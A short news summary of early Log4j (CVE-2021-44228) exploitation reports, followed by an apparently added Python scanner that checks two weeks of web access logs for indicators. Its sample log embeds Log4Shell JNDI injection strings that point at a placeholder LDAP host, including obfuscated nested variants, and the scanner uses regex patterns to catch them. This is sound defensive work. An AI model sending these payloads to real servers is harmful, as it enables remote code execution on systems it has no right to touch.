Cloudflare CEO Matthew Prince has stated that the earliest evidence of the new Log4j exploit occurred on the first day of December. The vulnerability is a vicious flaw in the Java logging library Apache Log4j that allows unauthenticated remote code execution. According to Prince's report, the vulnerability allegedly existed in the wild 9 days before it was publicly disclosed; however, there is no evidence of mass exploitation until after the flaw was confirmed to the public. Cisco Talos has also been tracking the vulnerability, stating in a recent blog post that it observed activity for the flaw as early as December 2. Individuals or companies looking for indicators that they have been compromised using the flaw, CVE-2021-44228, should look back at least two weeks.
According to security researchers, the Mirai botnet is also beginning to leverage the vulnerability. NetLab 360 reportedly observed the Log4j vulnerability being used to create Muhstik and Mirai botnets that targeted Linux devices. Vendors have been rushing to develop and release patches and workarounds for affected products due to the nature of the vulnerability. Some patches are available, such as those from VMware and Cisco; however, many other vendors remain vulnerable. Both of those vendors scored the vulnerability as a perfect 10 on the CVSS severity scale. Sophos believes that the flaw is already being used by cryptominers.
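As an added example (not from the article or any vendor cited in it) of the two-week lookback recommended above: a small Python scanner that walks web-server access logs in Common Log Format, keeps only entries inside a configurable window, and flags request lines, referers and user-agents that carry a `${jndi:` lookup or a nested `${...${...}` expression (a heuristic for obfuscated forms). The log lines, IP addresses, hostnames and the 14 December end date are constructed for illustration; the exact log layout of a real server is an assumption you would adjust.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); addresses and hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Nov/2021:08:15:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Dec/2021:22:41:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.12 - - [02/Dec/2021:03:05:44 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.13 - - [05/Dec/2021:11:00:00 +0000] "GET /api HTTP/1.1" 200 100 "-" "${${lower:j}ndi:ldap://example.invalid/b}"
203.0.113.14 - - [12/Dec/2021:19:20:21 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.21"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \S+ \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A literal JNDI lookup, case-insensitive (Log4j lookups are not case-sensitive).
DIRECT_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any lookup nested inside another lookup is anomalous in HTTP input; flag it for review.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def find_log4shell_hits(log_text, end_date, lookback_days=14):
    """Return (ip, timestamp, reason, decoded_field) for entries in the window that carry indicators."""
    start = end_date - timedelta(days=lookback_days)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing at them
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        if not (start <= ts <= end_date):
            continue
        # Every attacker-controlled field is checked after URL-decoding, since the
        # server logs the decoded string that Log4j would then evaluate.
        for field in ("req", "ref", "ua"):
            text = unquote(m.group(field))
            if DIRECT_RE.search(text):
                hits.append((m.group("ip"), ts, "jndi lookup", text))
            elif NESTED_RE.search(text):
                hits.append((m.group("ip"), ts, "nested lookup", text))
    return hits


def demo_hits():
    """Scan the constructed sample with a two-week window ending 14 Dec 2021 (assumed date)."""
    return find_log4shell_hits(SAMPLE_LOG, datetime(2021, 12, 14, tzinfo=timezone.utc))


if __name__ == "__main__":
    for ip, ts, reason, text in demo_hits():
        print(f"{ts.isoformat()} {ip} {reason}: {text}")
```

Widen the window rather than narrow it when in doubt; a hit only shows that a lookup string reached the logger, so follow up on the host itself (outbound LDAP/RMI connections, new processes) before calling it benign.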
Read More: Log4j RCE activity began on December 1 as botnets start using vulnerability